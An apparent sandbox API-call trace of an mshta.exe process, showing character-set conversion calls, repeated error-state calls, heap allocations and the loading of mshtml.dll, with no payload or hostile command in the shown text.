!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ茙Ꟶ溂´慠ꚇĀ", cchSrc=256, lpDestStr=0x14ec58, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0214.068] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x14f464, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xb4\x67\x87\xa6\x9c\xf6\x14", lpUsedDefaultChar=0x0) returned 256 [0214.068] GetLastError () returned 0x0 [0214.068] SetLastError (dwErrCode=0x0) [0214.068] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f564, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0214.068] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f564, cbMultiByte=256, lpWideCharStr=0x14ee88, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ茙Ꟶ溂´愀ꚇĀ") returned 256 [0214.068] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ茙Ꟶ溂´愀ꚇĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0214.068] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ茙Ꟶ溂´愀ꚇĀ", cchSrc=256, lpDestStr=0x14ec78, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0214.068] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x14f364, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xb4\x67\x87\xa6\x9c\xf6\x14", lpUsedDefaultChar=0x0) returned 256 [0214.068] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xb4b0f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0214.068] GetLastError () returned 0x0 [0214.068] SetLastError (dwErrCode=0x0) [0214.068] GetLastError () returned 0x0 [0214.068] SetLastError (dwErrCode=0x0) [0214.068] GetLastError () returned 0x0 [0214.068] SetLastError (dwErrCode=0x0) [0214.068] GetLastError () returned 0x0 [0214.068] SetLastError (dwErrCode=0x0) [0214.068] GetLastError () returned 0x0 [0214.068] SetLastError (dwErrCode=0x0) [0214.068] GetLastError () returned 0x0 [0214.068] SetLastError (dwErrCode=0x0) [0214.068] GetLastError () returned 0x0 [0214.068] SetLastError (dwErrCode=0x0) [0214.069] GetLastError () returned 0x0 [0214.069] SetLastError (dwErrCode=0x0) [0214.069] GetLastError () returned 0x0 [0214.069] SetLastError (dwErrCode=0x0) [0214.069] GetLastError () returned 0x0 [0214.069] SetLastError (dwErrCode=0x0) [0214.069] GetLastError () returned 0x0 [0214.069] SetLastError (dwErrCode=0x0) [0214.069] GetLastError () returned 0x0 [0214.069] SetLastError (dwErrCode=0x0) [0214.069] GetLastError () returned 0x0 [0214.069] SetLastError (dwErrCode=0x0) [0214.069] GetLastError () returned 0x0 [0214.069] SetLastError (dwErrCode=0x0) [0214.069] GetLastError () returned 0x0 [0214.069] SetLastError (dwErrCode=0x0) [0214.069] GetLastError () returned 0x0 [0214.069] SetLastError (dwErrCode=0x0) [0214.069] GetLastError () returned 0x0 [0214.069] SetLastError (dwErrCode=0x0) [0214.069] GetLastError () returned 0x0 [0214.069] SetLastError (dwErrCode=0x0) [0214.069] GetLastError () returned 0x0 [0214.069] SetLastError (dwErrCode=0x0) [0214.069] GetLastError () returned 0x0 [0214.070] SetLastError (dwErrCode=0x0) [0214.070] GetLastError () returned 0x0 [0214.070] SetLastError (dwErrCode=0x0) [0214.070] GetLastError () returned 0x0 [0214.070] SetLastError (dwErrCode=0x0) [0214.070] GetLastError () returned 0x0 [0214.070] SetLastError (dwErrCode=0x0) [0214.070] GetLastError () returned 0x0 [0214.070] SetLastError (dwErrCode=0x0) [0214.070] GetLastError () returned 0x0 [0214.070] SetLastError (dwErrCode=0x0) [0214.070] GetLastError () returned 0x0 [0214.070] SetLastError (dwErrCode=0x0) [0214.070] GetLastError () returned 0x0 [0214.070] SetLastError (dwErrCode=0x0) [0214.070] GetLastError () returned 0x0 [0214.070] SetLastError (dwErrCode=0x0) [0214.070] GetLastError () returned 0x0 [0214.070] SetLastError (dwErrCode=0x0) [0214.070] GetLastError () returned 0x0 [0214.070] SetLastError (dwErrCode=0x0) [0214.070] GetLastError () returned 0x0 [0214.070] SetLastError (dwErrCode=0x0) [0214.070] GetLastError () returned 0x0 [0214.071] SetLastError (dwErrCode=0x0) [0214.071] GetLastError () returned 0x0 [0214.071] SetLastError (dwErrCode=0x0) [0214.071] GetLastError () returned 0x0 [0214.071] SetLastError (dwErrCode=0x0) [0214.071] GetLastError () returned 0x0 [0214.227] SetLastError (dwErrCode=0x0) [0214.227] GetLastError () returned 0x0 [0214.227] SetLastError (dwErrCode=0x0) [0214.227] GetLastError () returned 0x0 [0214.227] SetLastError (dwErrCode=0x0) [0214.227] GetLastError () returned 0x0 [0214.228] SetLastError (dwErrCode=0x0) [0214.228] GetLastError () returned 0x0 [0214.228] SetLastError (dwErrCode=0x0) [0214.228] GetLastError () returned 0x0 [0214.228] SetLastError (dwErrCode=0x0) [0214.228] GetLastError () returned 0x0 [0214.228] SetLastError (dwErrCode=0x0) [0214.228] GetLastError () returned 0x0 [0214.228] SetLastError (dwErrCode=0x0) [0214.228] GetLastError () returned 0x0 [0214.228] SetLastError (dwErrCode=0x0) [0214.228] GetLastError () returned 0x0 [0214.228] SetLastError (dwErrCode=0x0) [0214.228] GetLastError () returned 0x0 [0214.228] SetLastError (dwErrCode=0x0) [0214.228] GetLastError () returned 0x0 [0214.228] SetLastError (dwErrCode=0x0) [0214.228] GetLastError () returned 0x0 [0214.228] SetLastError (dwErrCode=0x0) [0214.228] GetLastError () returned 0x0 [0214.228] SetLastError (dwErrCode=0x0) [0214.228] GetLastError () returned 0x0 [0214.228] SetLastError (dwErrCode=0x0) [0214.228] GetLastError () returned 0x0 [0214.228] SetLastError (dwErrCode=0x0) [0214.229] GetLastError () returned 0x0 [0214.229] SetLastError (dwErrCode=0x0) [0214.229] GetLastError () returned 0x0 [0214.229] SetLastError (dwErrCode=0x0) [0214.229] GetLastError () returned 0x0 [0214.229] SetLastError (dwErrCode=0x0) [0214.229] GetLastError () returned 0x0 [0214.229] SetLastError (dwErrCode=0x0) [0214.229] GetLastError () returned 0x0 [0214.229] SetLastError (dwErrCode=0x0) [0214.229] GetLastError () returned 0x0 [0214.229] SetLastError (dwErrCode=0x0) [0214.229] GetLastError () returned 0x0 [0214.229] SetLastError (dwErrCode=0x0) [0214.229] GetLastError () returned 0x0 [0214.229] SetLastError (dwErrCode=0x0) [0214.229] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x108) returned 0x331610 [0214.229] GetLastError () returned 0x0 [0214.229] SetLastError (dwErrCode=0x0) [0214.229] GetLastError () returned 0x0 [0214.229] SetLastError (dwErrCode=0x0) [0214.229] GetLastError () returned 0x0 [0214.229] SetLastError (dwErrCode=0x0) [0214.229] GetLastError () returned 0x0 [0214.230] SetLastError (dwErrCode=0x0) [0214.230] GetLastError () returned 0x0 [0214.230] SetLastError (dwErrCode=0x0) [0214.230] GetLastError () returned 0x0 [0214.230] SetLastError (dwErrCode=0x0) [0214.230] GetLastError () returned 0x0 [0214.230] SetLastError (dwErrCode=0x0) [0214.230] GetLastError () returned 0x0 [0214.230] SetLastError (dwErrCode=0x0) [0214.230] GetLastError () returned 0x0 [0214.230] SetLastError (dwErrCode=0x0) [0214.230] GetLastError () returned 0x0 [0214.230] SetLastError (dwErrCode=0x0) [0214.230] GetLastError () returned 0x0 [0214.230] SetLastError (dwErrCode=0x0) [0214.230] GetLastError () returned 0x0 [0214.230] SetLastError (dwErrCode=0x0) [0214.230] GetLastError () returned 0x0 [0214.230] SetLastError (dwErrCode=0x0) [0214.230] GetLastError () returned 0x0 [0214.230] SetLastError (dwErrCode=0x0) [0214.230] GetLastError () returned 0x0 [0214.230] SetLastError (dwErrCode=0x0) [0214.230] GetLastError () returned 0x0 [0214.231] SetLastError (dwErrCode=0x0) [0214.231] GetLastError () returned 0x0 [0214.231] SetLastError (dwErrCode=0x0) [0214.231] GetLastError () returned 0x0 [0214.231] SetLastError (dwErrCode=0x0) [0214.231] GetLastError () returned 0x0 [0214.231] SetLastError (dwErrCode=0x0) [0214.231] GetLastError () returned 0x0 [0214.231] SetLastError (dwErrCode=0x0) [0214.231] GetLastError () returned 0x0 [0214.231] SetLastError (dwErrCode=0x0) [0214.231] GetLastError () returned 0x0 [0214.231] SetLastError (dwErrCode=0x0) [0214.231] GetLastError () returned 0x0 [0214.231] SetLastError (dwErrCode=0x0) [0214.231] GetLastError () returned 0x0 [0214.231] SetLastError (dwErrCode=0x0) [0214.231] GetLastError () returned 0x0 [0214.231] SetLastError (dwErrCode=0x0) [0214.231] GetLastError () returned 0x0 [0214.231] SetLastError (dwErrCode=0x0) [0214.231] GetLastError () returned 0x0 [0214.232] SetLastError (dwErrCode=0x0) [0214.232] GetLastError () returned 0x0 [0214.232] SetLastError (dwErrCode=0x0) [0214.232] GetLastError () returned 0x0 [0214.232] SetLastError (dwErrCode=0x0) [0214.232] GetLastError () returned 0x0 [0214.232] SetLastError (dwErrCode=0x0) [0214.232] GetLastError () returned 0x0 [0214.232] SetLastError (dwErrCode=0x0) [0214.232] GetLastError () returned 0x0 [0214.232] SetLastError (dwErrCode=0x0) [0214.232] GetLastError () returned 0x0 [0214.232] SetLastError (dwErrCode=0x0) [0214.232] GetLastError () returned 0x0 [0214.232] SetLastError (dwErrCode=0x0) [0214.232] GetLastError () returned 0x0 [0214.232] SetLastError (dwErrCode=0x0) [0214.232] GetLastError () returned 0x0 [0214.232] SetLastError (dwErrCode=0x0) [0214.232] GetLastError () returned 0x0 [0214.232] SetLastError (dwErrCode=0x0) [0214.232] GetLastError () returned 0x0 [0214.232] SetLastError (dwErrCode=0x0) [0214.233] GetLastError () returned 0x0 [0214.233] SetLastError (dwErrCode=0x0) [0214.233] GetLastError () returned 0x0 [0214.233] SetLastError (dwErrCode=0x0) [0214.233] GetLastError () returned 0x0 [0214.233] SetLastError (dwErrCode=0x0) [0214.233] GetLastError () returned 0x0 [0214.233] SetLastError (dwErrCode=0x0) [0214.233] GetLastError () returned 0x0 [0214.233] SetLastError (dwErrCode=0x0) [0214.233] GetLastError () returned 0x0 [0214.233] SetLastError (dwErrCode=0x0) [0214.233] GetLastError () returned 0x0 [0214.233] SetLastError (dwErrCode=0x0) [0214.233] GetLastError () returned 0x0 [0214.233] SetLastError (dwErrCode=0x0) [0214.233] GetLastError () returned 0x0 [0214.233] SetLastError (dwErrCode=0x0) [0214.233] GetLastError () returned 0x0 [0214.233] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x5fc) returned 0x331720 [0214.233] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x330e78 | out: hHeap=0x330000) returned 1 [0214.234] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb42aef) returned 0x0 [0214.234] GetLastError () returned 0x0 [0214.234] GetVersion () returned 0x1db10106 [0214.234] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76180000 [0214.234] GetProcAddress (hModule=0x76180000, lpProcName="HeapSetInformation") returned 0x76195651 [0214.234] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0214.234] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x105) returned 0x331d28 [0214.234] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x105) returned 0x331e38 [0214.235] RegOpenKeyExA (in: hKey=0x80000000, lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0x14f6fc | out: phkResult=0x14f6fc*=0x42) returned 0x0 [0214.235] RegQueryValueExA (in: hKey=0x42, lpValueName=0x0, lpReserved=0x0, lpType=0x14f6f4, lpData=0x331d28, lpcbData=0x14f6f0*=0x105 | out: lpType=0x14f6f4*=0x1, lpData="C:\\Windows\\SysWOW64\\mshtml.dll", lpcbData=0x14f6f0*=0x1f) returned 0x0 [0214.235] LoadLibraryA (lpLibFileName="C:\\Windows\\SysWOW64\\mshtml.dll") returned 0x73f40000 [0221.024] GetProcessHeap () returned 0x510000 [0221.024] GetVersion () returned 0x1db10106 [0221.024] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76180000 [0221.024] GetProcAddress (hModule=0x76180000, lpProcName="HeapSetInformation") returned 0x76195651 [0221.024] HeapSetInformation (HeapHandle=0x510000, HeapInformationClass=0x0, HeapInformation=0x14f388, HeapInformationLength=0x4) returned 1 [0221.288] malloc (_Size=0x80) returned 0x342640 [0221.288] GetVersion () returned 0x1db10106 [0221.289] GetVersionExA (in: lpVersionInformation=0x14f260*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14f260*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0221.289] __dllonexit () returned 0x7416717c [0221.289] __dllonexit () returned 0x741673bd [0221.289] GetProcessHeap () returned 0x510000 [0221.289] __dllonexit () returned 0x74167435 [0221.289] __dllonexit () returned 0x74166e75 [0221.289] __dllonexit () returned 0x74166ff5 [0221.289] __dllonexit () returned 0x741671be [0221.289] __dllonexit () returned 0x741672e2 [0221.289] __dllonexit () returned 0x74167320 [0221.290] __dllonexit () returned 0x74167370 [0221.290] __dllonexit () returned 0x74166e53 [0221.290] __dllonexit () returned 0x74166e66 [0221.290] __dllonexit () returned 0x74166a3e [0221.290] __dllonexit () returned 0x74166a46 [0221.290] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc14a [0221.290] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc14a [0221.290] __dllonexit () returned 0x74166a60 [0221.290] __dllonexit () returned 0x74166a7a [0221.290] __dllonexit () returned 0x74166a93 [0221.290] __dllonexit () returned 0x74166aa7 [0221.290] __dllonexit () returned 0x74166ac1 [0221.290] __dllonexit () returned 0x741671f1 [0221.290] __dllonexit () returned 